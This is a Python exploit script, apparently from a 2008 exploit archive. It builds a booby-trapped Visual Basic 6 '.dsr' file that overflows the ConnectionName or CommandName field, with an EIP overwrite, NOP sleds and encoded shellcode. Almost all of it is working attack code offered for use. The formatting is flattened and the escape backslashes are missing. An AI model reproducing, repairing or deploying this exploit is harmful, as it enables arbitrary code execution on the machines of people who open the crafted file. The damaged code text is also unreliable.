msvis-dsr.txt
Posted on 19 January 2008
#usage: exploit.py import time print "---------------------------------------------------------------------------" print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow ' print " author: shinnai" print " mail: shinnai[at]autistici[dot]org" print " site: http://shinnai.altervista.org " print " Once you create the file, open it with Visual Basic 6 and click on" print " connection or command name." print "---------------------------------------------------------------------------" EIP = "xFFxBEx3Fx7E" #call ESP from user32.dll nop = "x90x90x90x90" shellcode = \n"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+\n"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+\n"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+\n"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+\n"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"+\n"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"+\n"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"+\n"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"+\n"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"+\n"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+\n"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"+\n"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"+\n"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"+\n"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"+\n"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"+\n"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"+\n"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"+\n"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"+\n"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"+\n"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"+\n"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"+\n"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a" try: choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+\n'3 to quit: ==> ')) if choice == 1: buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop try: vb_dsr = \n'VERSION 5.00 '+\n'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1 '+\n' ClientHeight = 6315 '+\n' ClientLeft = 0'+\n' ClientTop = 0 '+\n' ClientWidth = 7935 '+\n' _ExtentX = 13996 '+\n' _ExtentY = 11139 '+\n' FolderFlags = 1 '+\n' TypeInfoCookie = 0 '+\n' Version = 4 '+\n' NumConnections = 1 '+\n' BeginProperty Connection1 '+\n' ConnectionName = "' + buff + '" '+\n' ConnDispId = 1001 '+\n' SourceOfData = 3 '+\n' QuoteChar = 34 '+\n' SeparatorChar = 46 '+\n' EndProperty '+\n' NumRecordsets = 0 '+\n'End' + "x0Dx0A" #"x0Dx0A" ==> EOF out_file = open('ConnectionName.dsr','w') out_file.write(vb_dsr) out_file.close() print "FILE CREATED!" except: print "Something wrong in file creation!" if choice == 2: buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop try: vb_dsr = \n'VERSION 5.00 '+\n'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1 '+\n' ClientHeight = 6315 '+\n' ClientLeft = 0'+\n' ClientTop = 0 '+\n' ClientWidth = 7935 '+\n' _ExtentX = 13996 '+\n' _ExtentY = 11139 '+\n' FolderFlags = 1 '+\n' TypeInfoCookie = 0 '+\n' Version = 4 '+\n' NumConnections = 1 '+\n' BeginProperty Connection1 '+\n' ConnectionName = "Connection1" '+\n' ConnDispId = 1001 '+\n' SourceOfData = 3 '+\n' QuoteChar = 34 '+\n' SeparatorChar = 46 '+\n' EndProperty '+\n' NumRecordsets = 1 '+\n' BeginProperty Recordset1 '+\n' CommandName = "' + buff + '" '+\n' CommDispId = 1002 '+\n' RsDispId = -1 '+\n' ActiveConnectionName= "Connection1" '+\n' NumFields = 0 '+\n' NumGroups = 0 '+\n' ParamCount = 0 '+\n' RelationCount = 0 '+\n' AggregateCount = 0 '+\n' EndProperty '+\n'End' + "x0Dx0A" #"x0Dx0A" ==> EOF out_file = open('CommandName.dsr','w') out_file.write(vb_dsr) out_file.close() print "FILE CREATED!" except: print "Something wrong in file creation!" if choice == 3: print "Be safe!" if choice !=1 and choice != 2 and choice != 3: print "D'oh! You MUST choose a value between 1 and 3" except: print "mmm... ok, you want it..." time.sleep(4) print "London Bridge is falling down, Falling down, falling down London Bridge is falling down My fair lady" * 99999
